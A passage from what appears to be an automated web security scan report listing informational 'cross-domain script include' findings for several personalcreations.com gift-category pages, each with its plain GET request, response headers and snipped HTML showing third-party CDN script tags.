<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.25. http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-christmas-gifts-PCHRBSL

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /personalized-christmas-gifts-PCHRBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:10 GMT
Connection: close
Content-Length: 418054

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.26. http://www.personalcreations.com/personalized-communion-gifts-PCOMMUN

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-communion-gifts-PCOMMUN

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /personalized-communion-gifts-PCOMMUN HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:36 PM?0&9/3/2011 6:20:18 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:56 PM?0&9/3/2011 6:21:21 PM?0&9/3/2011 6:21:23 PM?0&9/3/2011 6:21:19 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:21:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:21:19 GMT
Connection: close
Content-Length: 259238

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.27. http://www.personalcreations.com/personalized-congratulations-gifts-PCONGRA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-congratulations-gifts-PCONGRA

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /personalized-congratulations-gifts-PCONGRA HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:40 PM?0&9/3/2011 6:19:52 PM?0&9/3/2011 6:19:56 PM?0&9/3/2011 6:20:33 PM?0&9/3/2011 6:20:09 PM?0&9/3/2011 6:21:18 PM?0&9/3/2011 6:21:00 PM?0&9/3/2011 6:20:59 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:59 GMT
Connection: close
Content-Length: 404968

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.28. http://www.personalcreations.com/personalized-graduation-gifts-PGRADUA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-graduation-gifts-PGRADUA

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /personalized-graduation-gifts-PGRADUA HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:36 PM?0&9/3/2011 6:20:18 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:56 PM?0&9/3/2011 6:21:21 PM?0&9/3/2011 6:21:23 PM?0&9/3/2011 6:21:19 PM?0&9/3/2011 6:22:03 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:22:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:22:05 GMT
Connection: close
Content-Length: 351790

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.29. http://www.personalcreations.com/personalized-halloween-clothes-PHALAPP

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-halloween-clothes-PHALAPP

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /personalized-halloween-clothes-PHALAPP HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:20:11 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:14 GMT
Connection: close
Content-Length: 333277

